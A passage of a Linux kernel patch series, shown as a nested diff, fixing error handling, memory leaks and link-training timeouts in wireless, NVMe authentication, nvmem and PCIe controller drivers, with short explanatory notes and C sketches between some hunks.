+-	ret = mt76_get_field(dev, MT_CONN_ON_MISC, MT_TOP_MISC2_FW_N9_RDY);
+-	if (ret && mt76_is_mmio(&dev->mt76)) {
+-		dev_dbg(dev->mt76.dev, "Firmware is already download\n");
+-		goto fw_loaded;
+-	}
+-
+ 	ret = mt76_connac2_load_patch(&dev->mt76, mt7921_patch_name(dev));
+ 	if (ret)
+ 		return ret;
+@@ -477,8 +471,6 @@ static int mt7921_load_firmware(struct mt7921_dev *dev)
+ 		return -EIO;
+ 	}
+ 
+-fw_loaded:
+-
+ #ifdef CONFIG_PM
+ 	dev->mt76.hw->wiphy->wowlan = &mt76_connac_wowlan_support;
+ #endif /* CONFIG_PM */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index c64b0b4e93583..b125694d6a2dc 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -316,6 +316,10 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	bus_ops->rmw = mt7921_rmw;
+ 	dev->mt76.bus = bus_ops;
+ 
++	ret = mt7921e_mcu_fw_pmctrl(dev);
++	if (ret)
++		goto err_free_dev;
++
+ 	ret = __mt7921e_mcu_drv_pmctrl(dev);
+ 	if (ret)
+ 		goto err_free_dev;
+@@ -324,6 +328,10 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 		    (mt7921_l1_rr(dev, MT_HW_REV) & 0xff);
+ 	dev_info(mdev->dev, "ASIC revision: %04x\n", mdev->rev);
+ 
++	ret = mt7921_wfsys_reset(dev);
++	if (ret)
++		goto err_free_dev;
++
+ 	mt76_wr(dev, MT_WFDMA0_HOST_INT_ENA, 0);
+ 
+ 	mt76_wr(dev, MT_PCIE_MAC_INT_ENABLE, 0xff);
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index 67df8221b5aeb..a1b75feec6edf 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -485,6 +485,9 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 		int rsn_ie_len = sizeof(struct element) + rsn_ie[1];
+ 		int offset = 8;
+ 
++		param->mode_802_11i = 2;
++		param->rsn_found = true;
++
+ 		/* extract RSN capabilities */
+ 		if (offset < rsn_ie_len) {
+ 			/* skip over pairwise suites */
+@@ -494,11 +497,8 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 				/* skip over authentication suites */
+ 				offset += (rsn_ie[offset] * 4) + 2;
+ 
+-				if (offset + 1 < rsn_ie_len) {
+-					param->mode_802_11i = 2;
+-					param->rsn_found = true;
++				if (offset + 1 < rsn_ie_len)
+ 					memcpy(param->rsn_cap, &rsn_ie[offset], 2);
+-				}
+ 			}
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/ray_cs.c b/drivers/net/wireless/ray_cs.c
+index 1f57a0055bbd8..38782d4c4694a 100644
+--- a/drivers/net/wireless/ray_cs.c
++++ b/drivers/net/wireless/ray_cs.c
+@@ -270,13 +270,14 @@ static int ray_probe(struct pcmcia_device *p_dev)
+ {
+ 	ray_dev_t *local;
+ 	struct net_device *dev;
++	int ret;
+ 
+ 	dev_dbg(&p_dev->dev, "ray_attach()\n");
+ 
+ 	/* Allocate space for private device-specific data */
+ 	dev = alloc_etherdev(sizeof(ray_dev_t));
+ 	if (!dev)
+-		goto fail_alloc_dev;
++		return -ENOMEM;
+ 
+ 	local = netdev_priv(dev);
+ 	local->finder = p_dev;
+@@ -313,11 +314,16 @@ static int ray_probe(struct pcmcia_device *p_dev)
+ 	timer_setup(&local->timer, NULL, 0);
+ 
+ 	this_device = p_dev;
+-	return ray_config(p_dev);
++	ret = ray_config(p_dev);
++	if (ret)
++		goto err_free_dev;
++
++	return 0;
+ 
+-fail_alloc_dev:
+-	return -ENOMEM;
+-} /* ray_attach */
++err_free_dev:
++	free_netdev(dev);
++	return ret;
++}
+ 
+ static void ray_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/rsi/rsi_91x_sdio.c b/drivers/net/wireless/rsi/rsi_91x_sdio.c
+index d09998796ac08..1911fef3bbad6 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_sdio.c
++++ b/drivers/net/wireless/rsi/rsi_91x_sdio.c
+@@ -1463,10 +1463,8 @@ static void rsi_shutdown(struct device *dev)
+ 
+ 	rsi_dbg(ERR_ZONE, "SDIO Bus shutdown =====>\n");
+ 
+-	if (hw) {
+-		struct cfg80211_wowlan *wowlan = hw->wiphy->wowlan_config;
+-
+-		if (rsi_config_wowlan(adapter, wowlan))
++	if (hw && hw->wiphy && hw->wiphy->wowlan_config) {
++		if (rsi_config_wowlan(adapter, hw->wiphy->wowlan_config))
+ 			rsi_dbg(ERR_ZONE, "Failed to configure WoWLAN\n");
+ 	}
+ 
+@@ -1481,9 +1479,6 @@ static void rsi_shutdown(struct device *dev)
+ 	if (sdev->write_fail)
+ 		rsi_dbg(INFO_ZONE, "###### Device is not ready #######\n");
+ 
+-	if (rsi_set_sdio_pm_caps(adapter))
+-		rsi_dbg(INFO_ZONE, "Setting power management caps failed\n");
+-
+ 	rsi_dbg(INFO_ZONE, "***** RSI module shut down *****\n");
+ }
+ 
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 7fb2f95134760..c45c4b7cbbaf1 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1862,6 +1862,7 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ {
+ 	struct net_device *dev;
+ 	struct wl3501_card *this;
++	int ret;
+ 
+ 	/* The io structure describes IO port mapping */
+ 	p_dev->resource[0]->end	= 16;
+@@ -1873,8 +1874,7 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ 
+ 	dev = alloc_etherdev(sizeof(struct wl3501_card));
+ 	if (!dev)
+-		goto out_link;
+-
++		return -ENOMEM;
+ 
+ 	dev->netdev_ops		= &wl3501_netdev_ops;
+ 	dev->watchdog_timeo	= 5 * HZ;
+@@ -1887,9 +1887,15 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ 	netif_stop_queue(dev);
+ 	p_dev->priv = dev;
+ 
+-	return wl3501_config(p_dev);
+-out_link:
+-	return -ENOMEM;
++	ret = wl3501_config(p_dev);
++	if (ret)
++		goto out_free_etherdev;
++
++	return 0;
++
++out_free_etherdev:
++	free_netdev(dev);
++	return ret;
+ }
+ 
+ static int wl3501_config(struct pcmcia_device *link)
+diff --git a/drivers/nvme/host/auth.c b/drivers/nvme/host/auth.c
+index c8a6db7c44980..9dfd3d0293054 100644
+--- a/drivers/nvme/host/auth.c
++++ b/drivers/nvme/host/auth.c
+@@ -654,7 +654,7 @@ gen_sesskey:
+ 	return 0;
+ }
+ 
+-static void __nvme_auth_reset(struct nvme_dhchap_queue_context *chap)
++static void nvme_auth_reset_dhchap(struct nvme_dhchap_queue_context *chap)
+ {
+ 	kfree_sensitive(chap->host_response);
+ 	chap->host_response = NULL;
+@@ -676,9 +676,9 @@ static void __nvme_auth_reset(struct nvme_dhchap_queue_context *chap)
+ 	memset(chap->c2, 0, sizeof(chap->c2));
+ }
+ 
+-static void __nvme_auth_free(struct nvme_dhchap_queue_context *chap)
++static void nvme_auth_free_dhchap(struct nvme_dhchap_queue_context *chap)
+ {
+-	__nvme_auth_reset(chap);
++	nvme_auth_reset_dhchap(chap);
+ 	if (chap->shash_tfm)
+ 		crypto_free_shash(chap->shash_tfm);
+ 	if (chap->dh_tfm)
+@@ -691,7 +691,7 @@ static void __nvme_auth_free(struct nvme_dhchap_queue_context *chap)
+ 	kfree(chap);
+ }
+ 
+-static void __nvme_auth_work(struct work_struct *work)
++static void nvme_queue_auth_work(struct work_struct *work)
+ {
+ 	struct nvme_dhchap_queue_context *chap =
+ 		container_of(work, struct nvme_dhchap_queue_context, auth_work);
+@@ -868,7 +868,7 @@ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ 			dev_dbg(ctrl->device, "qid %d: re-using context\n", qid);
+ 			mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 			flush_work(&chap->auth_work);
+-			__nvme_auth_reset(chap);
++			nvme_auth_reset_dhchap(chap);
+ 			queue_work(nvme_wq, &chap->auth_work);
+ 			return 0;
+ 		}
+@@ -893,7 +893,7 @@ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ 		return -ENOMEM;
+ 	}
+ 
+-	INIT_WORK(&chap->auth_work, __nvme_auth_work);
++	INIT_WORK(&chap->auth_work, nvme_queue_auth_work);
+ 	list_add(&chap->entry, &ctrl->dhchap_auth_list);
+ 	mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 	queue_work(nvme_wq, &chap->auth_work);
+@@ -920,21 +920,7 @@ int nvme_auth_wait(struct nvme_ctrl *ctrl, int qid)
+ }
+ EXPORT_SYMBOL_GPL(nvme_auth_wait);
+ 
+-void nvme_auth_reset(struct nvme_ctrl *ctrl)
+-{
+-	struct nvme_dhchap_queue_context *chap;
+-
+-	mutex_lock(&ctrl->dhchap_auth_mutex);
+-	list_for_each_entry(chap, &ctrl->dhchap_auth_list, entry) {
+-		mutex_unlock(&ctrl->dhchap_auth_mutex);
+-		flush_work(&chap->auth_work);
+-		__nvme_auth_reset(chap);
+-	}
+-	mutex_unlock(&ctrl->dhchap_auth_mutex);
+-}
+-EXPORT_SYMBOL_GPL(nvme_auth_reset);
+-
+-static void nvme_dhchap_auth_work(struct work_struct *work)
++static void nvme_ctrl_auth_work(struct work_struct *work)
+ {
+ 	struct nvme_ctrl *ctrl =
+ 		container_of(work, struct nvme_ctrl, dhchap_auth_work);
+@@ -970,15 +956,26 @@ static void nvme_dhchap_auth_work(struct work_struct *work)
+ 	 */
+ }
+ 
+-void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
++int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
+ {
++	int ret;
++
+ 	INIT_LIST_HEAD(&ctrl->dhchap_auth_list);
+-	INIT_WORK(&ctrl->dhchap_auth_work, nvme_dhchap_auth_work);
++	INIT_WORK(&ctrl->dhchap_auth_work, nvme_ctrl_auth_work);
+ 	mutex_init(&ctrl->dhchap_auth_mutex);
+ 	if (!ctrl->opts)
+-		return;
+-	nvme_auth_generate_key(ctrl->opts->dhchap_secret, &ctrl->host_key);
+-	nvme_auth_generate_key(ctrl->opts->dhchap_ctrl_secret, &ctrl->ctrl_key);
++		return 0;
++	ret = nvme_auth_generate_key(ctrl->opts->dhchap_secret,
++			&ctrl->host_key);
++	if (ret)
++		return ret;
++	ret = nvme_auth_generate_key(ctrl->opts->dhchap_ctrl_secret,
++			&ctrl->ctrl_key);
++	if (ret) {
++		nvme_auth_free_key(ctrl->host_key);
++		ctrl->host_key = NULL;
++	}
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_auth_init_ctrl);
+ 
+@@ -1002,7 +999,7 @@ void nvme_auth_free(struct nvme_ctrl *ctrl)
+ 	list_for_each_entry_safe(chap, tmp, &ctrl->dhchap_auth_list, entry) {
+ 		list_del_init(&chap->entry);
+ 		flush_work(&chap->auth_work);
+-		__nvme_auth_free(chap);
++		nvme_auth_free_dhchap(chap);
+ 	}
+ 	mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 	if (ctrl->host_key) {
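
nvme_auth_init_ctrl() now reports failures, and the two-key setup above rolls back: if generating the controller key fails after the host key succeeded, the host key is freed and cleared so the caller never sees a half-initialized pair. A sketch of that pairwise rollback with stand-in generate/free helpers (all names here are invented):

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>

    struct key { int id; };

    static int generate_key(int id, struct key **out)
    {
            if (id < 0)
                    return -EINVAL;     /* simulate a failure path */
            *out = malloc(sizeof(**out));
            if (!*out)
                    return -ENOMEM;
            (*out)->id = id;
            return 0;
    }

    static void free_key(struct key *k) { free(k); }

    static int init_keys(int host_id, int ctrl_id,
                         struct key **host, struct key **ctrl)
    {
            int ret = generate_key(host_id, host);

            if (ret)
                    return ret;
            ret = generate_key(ctrl_id, ctrl);
            if (ret) {              /* roll back the first key */
                    free_key(*host);
                    *host = NULL;
            }
            return ret;
    }

    int main(void)
    {
            struct key *host = NULL, *ctrl = NULL;

            printf("ok pair: %d\n", init_keys(1, 2, &host, &ctrl));
            free_key(host); free_key(ctrl);
            host = ctrl = NULL;
            printf("bad ctrl key: %d, host=%p\n",
                   init_keys(1, -1, &host, &ctrl), (void *)host);
            return 0;
    }
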
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index a7d9b5b42b388..560ce2f05a96d 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3825,16 +3825,17 @@ static ssize_t nvme_ctrl_dhchap_secret_store(struct device *dev,
+ 		int ret;
+ 
+ 		ret = nvme_auth_generate_key(dhchap_secret, &key);
+-		if (ret)
++		if (ret) {
++			kfree(dhchap_secret);
+ 			return ret;
++		}
+ 		kfree(opts->dhchap_secret);
+ 		opts->dhchap_secret = dhchap_secret;
+ 		host_key = ctrl->host_key;
+ 		ctrl->host_key = key;
+ 		nvme_auth_free_key(host_key);
+-		/* Key has changed; re-authentication with new key */
+-		nvme_auth_reset(ctrl);
+-	}
++	} else
++		kfree(dhchap_secret);
+ 	/* Start re-authentication */
+ 	dev_info(ctrl->device, "re-authenticating controller\n");
+ 	queue_work(nvme_wq, &ctrl->dhchap_auth_work);
+@@ -3879,16 +3880,17 @@ static ssize_t nvme_ctrl_dhchap_ctrl_secret_store(struct device *dev,
+ 		int ret;
+ 
+ 		ret = nvme_auth_generate_key(dhchap_secret, &key);
+-		if (ret)
++		if (ret) {
++			kfree(dhchap_secret);
+ 			return ret;
++		}
+ 		kfree(opts->dhchap_ctrl_secret);
+ 		opts->dhchap_ctrl_secret = dhchap_secret;
+ 		ctrl_key = ctrl->ctrl_key;
+ 		ctrl->ctrl_key = key;
+ 		nvme_auth_free_key(ctrl_key);
+-		/* Key has changed; re-authentication with new key */
+-		nvme_auth_reset(ctrl);
+-	}
++	} else
++		kfree(dhchap_secret);
+ 	/* Start re-authentication */
+ 	dev_info(ctrl->device, "re-authenticating controller\n");
+ 	queue_work(nvme_wq, &ctrl->dhchap_auth_work);
+@@ -5169,9 +5171,15 @@ int nvme_init_ctrl(struct nvme_ctrl *ctrl, struct device *dev,
+ 
+ 	nvme_fault_inject_init(&ctrl->fault_inject, dev_name(ctrl->device));
+ 	nvme_mpath_init_ctrl(ctrl);
+-	nvme_auth_init_ctrl(ctrl);
++	ret = nvme_auth_init_ctrl(ctrl);
++	if (ret)
++		goto out_free_cdev;
+ 
+ 	return 0;
++out_free_cdev:
++	nvme_fault_inject_fini(&ctrl->fault_inject);
++	dev_pm_qos_hide_latency_tolerance(ctrl->device);
++	cdev_device_del(&ctrl->cdev, ctrl->device);
+ out_free_name:
+ 	nvme_put_ctrl(ctrl);
+ 	kfree_const(ctrl->device->kobj.name);
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 2aa514c3dfa17..69f9e69208f68 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -1028,14 +1028,16 @@ static inline bool nvme_ctrl_sgl_supported(struct nvme_ctrl *ctrl)
+ }
+ 
+ #ifdef CONFIG_NVME_AUTH
+-void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl);
++int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl);
+ void nvme_auth_stop(struct nvme_ctrl *ctrl);
+ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid);
+ int nvme_auth_wait(struct nvme_ctrl *ctrl, int qid);
+-void nvme_auth_reset(struct nvme_ctrl *ctrl);
+ void nvme_auth_free(struct nvme_ctrl *ctrl);
+ #else
+-static inline void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl) {};
++static inline int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
++{
++	return 0;
++}
+ static inline void nvme_auth_stop(struct nvme_ctrl *ctrl) {};
+ static inline int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ {
+diff --git a/drivers/nvmem/rmem.c b/drivers/nvmem/rmem.c
+index 80cb187f14817..752d0bf4445ee 100644
+--- a/drivers/nvmem/rmem.c
++++ b/drivers/nvmem/rmem.c
+@@ -71,6 +71,7 @@ static int rmem_probe(struct platform_device *pdev)
+ 	config.dev = dev;
+ 	config.priv = priv;
+ 	config.name = "rmem";
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.size = mem->size;
+ 	config.reg_read = rmem_read;
+ 
+diff --git a/drivers/nvmem/sunplus-ocotp.c b/drivers/nvmem/sunplus-ocotp.c
+index 52b928a7a6d58..f85350b17d672 100644
+--- a/drivers/nvmem/sunplus-ocotp.c
++++ b/drivers/nvmem/sunplus-ocotp.c
+@@ -192,9 +192,11 @@ static int sp_ocotp_probe(struct platform_device *pdev)
+ 	sp_ocotp_nvmem_config.dev = dev;
+ 
+ 	nvmem = devm_nvmem_register(dev, &sp_ocotp_nvmem_config);
+-	if (IS_ERR(nvmem))
+-		return dev_err_probe(&pdev->dev, PTR_ERR(nvmem),
++	if (IS_ERR(nvmem)) {
++		ret = dev_err_probe(&pdev->dev, PTR_ERR(nvmem),
+ 						"register nvmem device fail\n");
++		goto err;
++	}
+ 
+ 	platform_set_drvdata(pdev, nvmem);
+ 
+@@ -203,6 +205,9 @@ static int sp_ocotp_probe(struct platform_device *pdev)
+ 		(int)OTP_WORD_SIZE, (int)QAC628_OTP_SIZE);
+ 
+ 	return 0;
++err:
++	clk_unprepare(otp->clk);
++	return ret;
+ }
+ 
+ static const struct of_device_id sp_ocotp_dt_ids[] = {
+diff --git a/drivers/pci/controller/cadence/pcie-cadence-host.c b/drivers/pci/controller/cadence/pcie-cadence-host.c
+index 940c7dd701d68..5b14f7ee3c798 100644
+--- a/drivers/pci/controller/cadence/pcie-cadence-host.c
++++ b/drivers/pci/controller/cadence/pcie-cadence-host.c
+@@ -12,6 +12,8 @@
+ 
+ #include "pcie-cadence.h"
+ 
++#define LINK_RETRAIN_TIMEOUT HZ
++
+ static u64 bar_max_size[] = {
+ 	[RP_BAR0] = _ULL(128 * SZ_2G),
+ 	[RP_BAR1] = SZ_2G,
+@@ -77,6 +79,27 @@ static struct pci_ops cdns_pcie_host_ops = {
+ 	.write		= pci_generic_config_write,
+ };
+ 
++static int cdns_pcie_host_training_complete(struct cdns_pcie *pcie)
++{
++	u32 pcie_cap_off = CDNS_PCIE_RP_CAP_OFFSET;
++	unsigned long end_jiffies;
++	u16 lnk_stat;
++
++	/* Wait for link training to complete. Exit after timeout. */
++	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
++	do {
++		lnk_stat = cdns_pcie_rp_readw(pcie, pcie_cap_off + PCI_EXP_LNKSTA);
++		if (!(lnk_stat & PCI_EXP_LNKSTA_LT))
++			break;
++		usleep_range(0, 1000);
++	} while (time_before(jiffies, end_jiffies));
++
++	if (!(lnk_stat & PCI_EXP_LNKSTA_LT))
++		return 0;
++
++	return -ETIMEDOUT;
++}
++
+ static int cdns_pcie_host_wait_for_link(struct cdns_pcie *pcie)
+ {
+ 	struct device *dev = pcie->dev;
+@@ -118,6 +141,10 @@ static int cdns_pcie_retrain(struct cdns_pcie *pcie)
+ 		cdns_pcie_rp_writew(pcie, pcie_cap_off + PCI_EXP_LNKCTL,
+ 				    lnk_ctl);
+ 
++		ret = cdns_pcie_host_training_complete(pcie);
++		if (ret)
++			return ret;
++
+ 		ret = cdns_pcie_host_wait_for_link(pcie);
+ 	}
+ 	return ret;
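
cdns_pcie_host_training_complete() above is a bounded poll: reread PCI_EXP_LNKSTA until the Link Training bit clears or the one-second LINK_RETRAIN_TIMEOUT deadline (HZ jiffies) passes, then test the bit once more so a success on the final read isn't misreported as -ETIMEDOUT. A userspace sketch of the same shape against a fake status word:

    #include <errno.h>
    #include <stdio.h>
    #include <time.h>

    #define LNKSTA_LT 0x0800u   /* "link training in progress" bit */

    static unsigned int fake_lnksta = LNKSTA_LT;
    static int reads;

    static unsigned int read_lnksta(void)
    {
            if (++reads == 3)               /* training "completes" */
                    fake_lnksta &= ~LNKSTA_LT;
            return fake_lnksta;
    }

    static int wait_training_complete(void)
    {
            struct timespec now, end;
            unsigned int sta;

            clock_gettime(CLOCK_MONOTONIC, &end);
            end.tv_sec += 1;                /* ~1 s deadline */

            do {
                    sta = read_lnksta();
                    if (!(sta & LNKSTA_LT))
                            break;
                    nanosleep(&(struct timespec){ .tv_nsec = 1000000 }, NULL);
                    clock_gettime(CLOCK_MONOTONIC, &now);
            } while (now.tv_sec < end.tv_sec ||
                     (now.tv_sec == end.tv_sec && now.tv_nsec < end.tv_nsec));

            /* Recheck after the loop, like the hunk above. */
            return (sta & LNKSTA_LT) ? -ETIMEDOUT : 0;
    }

    int main(void)
    {
            printf("wait -> %d after %d reads\n",
                   wait_training_complete(), reads);
            return 0;
    }
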
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index dbe6df0cb6118..49905b2a99607 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -31,7 +31,35 @@
+ #include "../../pci.h"
+ #include "pcie-designware.h"
+ 
+-#define PCIE20_PARF_SYS_CTRL			0x00
++/* PARF registers */
++#define PARF_SYS_CTRL				0x00
++#define PARF_PM_CTRL				0x20
++#define PARF_PCS_DEEMPH				0x34
++#define PARF_PCS_SWING				0x38
++#define PARF_PHY_CTRL				0x40
++#define PARF_PHY_REFCLK				0x4c
++#define PARF_CONFIG_BITS			0x50
++#define PARF_DBI_BASE_ADDR			0x168
++#define PARF_SLV_ADDR_SPACE_SIZE_2_3_3		0x16c /* Register offset specific to IP ver 2.3.3 */
++#define PARF_MHI_CLOCK_RESET_CTRL		0x174
++#define PARF_AXI_MSTR_WR_ADDR_HALT		0x178
++#define PARF_AXI_MSTR_WR_ADDR_HALT_V2		0x1a8
++#define PARF_Q2A_FLUSH				0x1ac
++#define PARF_LTSSM				0x1b0
++#define PARF_SID_OFFSET				0x234
++#define PARF_BDF_TRANSLATE_CFG			0x24c
++#define PARF_SLV_ADDR_SPACE_SIZE		0x358
++#define PARF_DEVICE_TYPE			0x1000
++#define PARF_BDF_TO_SID_TABLE_N			0x2000
++
++/* ELBI registers */
++#define ELBI_SYS_CTRL				0x04
++
++/* DBI registers */
++#define AXI_MSTR_RESP_COMP_CTRL0		0x818
++#define AXI_MSTR_RESP_COMP_CTRL1		0x81c
++
++/* PARF_SYS_CTRL register fields */
+ #define MST_WAKEUP_EN				BIT(13)
+ #define SLV_WAKEUP_EN				BIT(12)
+ #define MSTR_ACLK_CGC_DIS			BIT(10)
+@@ -41,45 +69,53 @@
+ #define L23_CLK_RMV_DIS				BIT(2)
+ #define L1_CLK_RMV_DIS				BIT(1)
+ 
+-#define PCIE20_PARF_PM_CTRL			0x20
++/* PARF_PM_CTRL register fields */
+ #define REQ_NOT_ENTR_L1				BIT(5)
+ 
+-#define PCIE20_PARF_PHY_CTRL			0x40
++/* PARF_PCS_DEEMPH register fields */
++#define PCS_DEEMPH_TX_DEEMPH_GEN1(x)		((x) << 16)
++#define PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(x)	((x) << 8)
++#define PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(x)	((x) << 0)
++
++/* PARF_PCS_SWING register fields */
++#define PCS_SWING_TX_SWING_FULL(x)		((x) << 8)
++#define PCS_SWING_TX_SWING_LOW(x)		((x) << 0)
++
++/* PARF_PHY_CTRL register fields */
+ #define PHY_CTRL_PHY_TX0_TERM_OFFSET_MASK	GENMASK(20, 16)
+ #define PHY_CTRL_PHY_TX0_TERM_OFFSET(x)		((x) << 16)
+ 
+-#define PCIE20_PARF_PHY_REFCLK			0x4C
++/* PARF_PHY_REFCLK register fields */
+ #define PHY_REFCLK_SSP_EN			BIT(16)
+ #define PHY_REFCLK_USE_PAD			BIT(12)
+ 
+-#define PCIE20_PARF_DBI_BASE_ADDR		0x168
+-#define PCIE20_PARF_SLV_ADDR_SPACE_SIZE		0x16C
+-#define PCIE20_PARF_MHI_CLOCK_RESET_CTRL	0x174
++/* PARF_CONFIG_BITS register fields */
++#define PHY_RX0_EQ(x)				((x) << 24)
++
++/* PARF_SLV_ADDR_SPACE_SIZE register value */
++#define SLV_ADDR_SPACE_SZ			0x10000000
++
++/* PARF_MHI_CLOCK_RESET_CTRL register fields */
+ #define AHB_CLK_EN				BIT(0)
+ #define MSTR_AXI_CLK_EN				BIT(1)
+ #define BYPASS					BIT(4)
+ 
+-#define PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT	0x178
+-#define PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2	0x1A8
+-#define PCIE20_PARF_LTSSM			0x1B0
+-#define PCIE20_PARF_SID_OFFSET			0x234
+-#define PCIE20_PARF_BDF_TRANSLATE_CFG		0x24C
+-#define PCIE20_PARF_DEVICE_TYPE			0x1000
+-#define PCIE20_PARF_BDF_TO_SID_TABLE_N		0x2000
++/* PARF_DEVICE_TYPE register fields */
++#define DEVICE_TYPE_RC				0x4
+ 
+-#define PCIE20_ELBI_SYS_CTRL			0x04
+-#define PCIE20_ELBI_SYS_CTRL_LT_ENABLE		BIT(0)
++/* ELBI_SYS_CTRL register fields */
++#define ELBI_SYS_CTRL_LT_ENABLE			BIT(0)
+ 
+-#define PCIE20_AXI_MSTR_RESP_COMP_CTRL0		0x818
++/* AXI_MSTR_RESP_COMP_CTRL0 register fields */
+ #define CFG_REMOTE_RD_REQ_BRIDGE_SIZE_2K	0x4
+ #define CFG_REMOTE_RD_REQ_BRIDGE_SIZE_4K	0x5
+-#define PCIE20_AXI_MSTR_RESP_COMP_CTRL1		0x81c
++
++/* AXI_MSTR_RESP_COMP_CTRL1 register fields */
+ #define CFG_BRIDGE_SB_INIT			BIT(0)
+ 
+-#define PCIE_CAP_SLOT_POWER_LIMIT_VAL		FIELD_PREP(PCI_EXP_SLTCAP_SPLV, \
+-						250)
+-#define PCIE_CAP_SLOT_POWER_LIMIT_SCALE		FIELD_PREP(PCI_EXP_SLTCAP_SPLS, \
+-						1)
++/* PCI_EXP_SLTCAP register fields */
++#define PCIE_CAP_SLOT_POWER_LIMIT_VAL		FIELD_PREP(PCI_EXP_SLTCAP_SPLV, 250)
++#define PCIE_CAP_SLOT_POWER_LIMIT_SCALE		FIELD_PREP(PCI_EXP_SLTCAP_SPLS, 1)
+ #define PCIE_CAP_SLOT_VAL			(PCI_EXP_SLTCAP_ABP | \
+ 						PCI_EXP_SLTCAP_PCP | \
+ 						PCI_EXP_SLTCAP_MRLSP | \
+@@ -91,36 +127,12 @@
+ 						PCIE_CAP_SLOT_POWER_LIMIT_VAL | \
+ 						PCIE_CAP_SLOT_POWER_LIMIT_SCALE)
+ 
+-#define PCIE20_PARF_Q2A_FLUSH			0x1AC
+-
+-#define PCIE20_MISC_CONTROL_1_REG		0x8BC
+-#define DBI_RO_WR_EN				1
+-
+ #define PERST_DELAY_US				1000
+-/* PARF registers */
+-#define PCIE20_PARF_PCS_DEEMPH			0x34
+-#define PCS_DEEMPH_TX_DEEMPH_GEN1(x)		((x) << 16)
+-#define PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(x)	((x) << 8)
+-#define PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(x)	((x) << 0)
+ 
+-#define PCIE20_PARF_PCS_SWING			0x38
+-#define PCS_SWING_TX_SWING_FULL(x)		((x) << 8)
+-#define PCS_SWING_TX_SWING_LOW(x)		((x) << 0)
++#define QCOM_PCIE_2_1_0_MAX_SUPPLY		3
++#define QCOM_PCIE_2_1_0_MAX_CLOCKS		5
+ 
+-#define PCIE20_PARF_CONFIG_BITS		0x50
+-#define PHY_RX0_EQ(x)				((x) << 24)
+-
+-#define PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE	0x358
+-#define SLV_ADDR_SPACE_SZ			0x10000000
+-
+-#define PCIE20_LNK_CONTROL2_LINK_STATUS2	0xa0
+-
+-#define DEVICE_TYPE_RC				0x4
+-
+-#define QCOM_PCIE_2_1_0_MAX_SUPPLY	3
+-#define QCOM_PCIE_2_1_0_MAX_CLOCKS	5
+-
+-#define QCOM_PCIE_CRC8_POLYNOMIAL (BIT(2) | BIT(1) | BIT(0))
++#define QCOM_PCIE_CRC8_POLYNOMIAL		(BIT(2) | BIT(1) | BIT(0))
+ 
+ struct qcom_pcie_resources_2_1_0 {
+ 	struct clk_bulk_data clks[QCOM_PCIE_2_1_0_MAX_CLOCKS];
+@@ -258,9 +270,9 @@ static void qcom_pcie_2_1_0_ltssm_enable(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable link training */
+-	val = readl(pcie->elbi + PCIE20_ELBI_SYS_CTRL);
+-	val |= PCIE20_ELBI_SYS_CTRL_LT_ENABLE;
+-	writel(val, pcie->elbi + PCIE20_ELBI_SYS_CTRL);
++	val = readl(pcie->elbi + ELBI_SYS_CTRL);
++	val |= ELBI_SYS_CTRL_LT_ENABLE;
++	writel(val, pcie->elbi + ELBI_SYS_CTRL);
+ }
+ 
+ static int qcom_pcie_get_resources_2_1_0(struct qcom_pcie *pcie)
+@@ -330,7 +342,7 @@ static void qcom_pcie_deinit_2_1_0(struct qcom_pcie *pcie)
